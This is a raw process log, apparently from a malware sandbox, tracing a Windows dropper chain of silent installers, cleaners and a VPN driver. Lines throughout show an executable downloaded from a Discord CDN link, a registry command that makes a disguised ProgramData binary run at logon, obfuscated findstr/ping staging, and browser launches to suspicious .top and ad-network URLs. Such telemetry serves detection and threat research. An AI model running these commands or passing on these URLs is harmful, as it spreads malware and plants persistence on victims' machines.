C:\Users\Admin\AppData\Local\Temp\BD07.tmp\BD08.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BD07.tmp\BD08.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Users\Admin\AppData\Roaming\5980817.exe
"C:\Users\Admin\AppData\Roaming\5980817.exe"
C:\Users\Admin\AppData\Local\Temp\is-ISPVM.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-ISPVM.tmp\Setup.exe" /silent /subid=720
C:\Users\Admin\AppData\Roaming\2665877.exe
"C:\Users\Admin\AppData\Roaming\2665877.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7628 -s 292
C:\Users\Admin\AppData\Local\Temp\is-FNQ6G.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-FNQ6G.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Users\Admin\AppData\Local\Temp\6710\DES6_6_6.exe
DES6_6_6.exe
C:\Users\Admin\AppData\Local\Temp\BD07.tmp\BD08.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BD07.tmp\BD08.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Users\Admin\AppData\Local\Temp\is-I61CT.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-I61CT.tmp\Setup.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp" /SL5="$202C4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-ISPVM.tmp\Setup.exe" /silent /subid=720
C:\Users\Admin\AppData\Local\Temp\is-JT7OM.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JT7OM.tmp\Setup.tmp" /SL5="$40508,17345880,721408,C:\Users\Admin\AppData\Local\Temp\is-FNQ6G.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Users\Admin\AppData\Local\Temp\251A.exe
C:\Users\Admin\AppData\Local\Temp\251A.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-O9JLM.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5136 -ip 5136
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 6831E2CF1B0E8CCA4F06F326073CBA90 C
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5136 -s 272
C:\Users\Admin\AppData\Local\Temp\3DA4.exe
C:\Users\Admin\AppData\Local\Temp\3DA4.exe
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-O9JLM.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 5329ECC82126A5A2E3E06E4FE246706F C
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-HP6V7.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-HP6V7.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 548 -p 7012 -ip 7012
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 622D8E927F8F9D44FCB85A082A11AD15
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 440 -ip 440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 440 -s 292
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Windows Media Player\NABQKOXRFC\ultramediaburner.exe
"C:\Program Files\Windows Media Player\NABQKOXRFC\ultramediaburner.exe" /VERYSILENT
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7012 -s 2460
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\8a-852a6-bb1-a489f-3df4324588e61\Cibysoxyla.exe
"C:\Users\Admin\AppData\Local\Temp\8a-852a6-bb1-a489f-3df4324588e61\Cibysoxyla.exe"
C:\Users\Admin\AppData\Local\Temp\is-P9QUF.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P9QUF.tmp\ultramediaburner.tmp" /SL5="$2047A,281924,62464,C:\Program Files\Windows Media Player\NABQKOXRFC\ultramediaburner.exe" /VERYSILENT
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Users\Admin\AppData\Local\Temp\8e-de339-92d-af89c-13c1ce2fc47b1\Laebigibudae.exe
"C:\Users\Admin\AppData\Local\Temp\8e-de339-92d-af89c-13c1ce2fc47b1\Laebigibudae.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
C:\Users\Admin\AppData\Local\Temp\is-O9JLM.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-O9JLM.tmp\{app}\vdi_compiler"
C:\Users\Admin\AppData\Local\Temp\7753.exe
C:\Users\Admin\AppData\Local\Temp\7753.exe
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 664 -p 3608 -ip 3608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3952 -ip 3952
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 6964 -ip 6964
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6964 -s 276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 2408
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3608 -s 2372
C:\Users\Admin\AppData\Local\Temp\8723.exe
C:\Users\Admin\AppData\Local\Temp\8723.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6064 -ip 6064
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6064 -s 276
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 5168 -ip 5168
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\Documents\rS8DTVJPDzvY5pdmMeaCTtGM.exe
"C:\Users\Admin\Documents\rS8DTVJPDzvY5pdmMeaCTtGM.exe"
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{36c7c2f0-fafa-244a-87d2-80335cb59059}\oemvista.inf" "9" "4d14a44ff" "000000000000014C" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449&param=721
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1a4,0x1f0,0x7ffef07d46f8,0x7ffef07d4708,0x7ffef07d4718
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6944 -ip 6944
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000164" "c070"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6944 -s 2212
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 364 -p 3096 -ip 3096
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3128 /prefetch:1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3096 -s 304
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4460 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4744 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\prlrk1ku.rzx\GcleanerEU.exe /eufive & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\installer.exe /qn CAMPAIGN="654" & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef07d46f8,0x7ffef07d4708,0x7ffef07d4718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4aatpbft.aog\ufgaa.exe & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\installer.exe
C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\installer.exe /qn CAMPAIGN="654"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i24nbx41.0on\anyname.exe & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\prlrk1ku.rzx\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\prlrk1ku.rzx\GcleanerEU.exe /eufive
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F2F0442D9959C6952BFB1C07C43908E1 C
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 6636 -ip 6636
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 276
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lfwem0qs.nfc\askinstall52.exe & exit
C:\Users\Admin\AppData\Local\Temp\i24nbx41.0on\anyname.exe
C:\Users\Admin\AppData\Local\Temp\i24nbx41.0on\anyname.exe
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\i24nbx41.0on\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\i24nbx41.0on\anyname.exe" -q
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5920 /prefetch:8
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kw1jrwmk.0bs\gcleaner.exe /mixfive & exit
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Users\Admin\AppData\Local\Temp\lfwem0qs.nfc\askinstall52.exe
C:\Users\Admin\AppData\Local\Temp\lfwem0qs.nfc\askinstall52.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 7600 -ip 7600
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tyonff5j.0fb\autosubplayer.exe /S & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7600 -s 868
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5920 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2rw3gt2r.wue\installer.exe /qn CAMPAIGN=654 & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\kw1jrwmk.0bs\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\kw1jrwmk.0bs\gcleaner.exe /mixfive
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rroyph2y.2bo\app.exe /8-2222 & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\2rw3gt2r.wue\installer.exe
C:\Users\Admin\AppData\Local\Temp\2rw3gt2r.wue\installer.exe /qn CAMPAIGN=654
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 7428 -ip 7428
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 272
C:\Users\Admin\AppData\Local\Temp\rroyph2y.2bo\app.exe
C:\Users\Admin\AppData\Local\Temp\rroyph2y.2bo\app.exe /8-2222
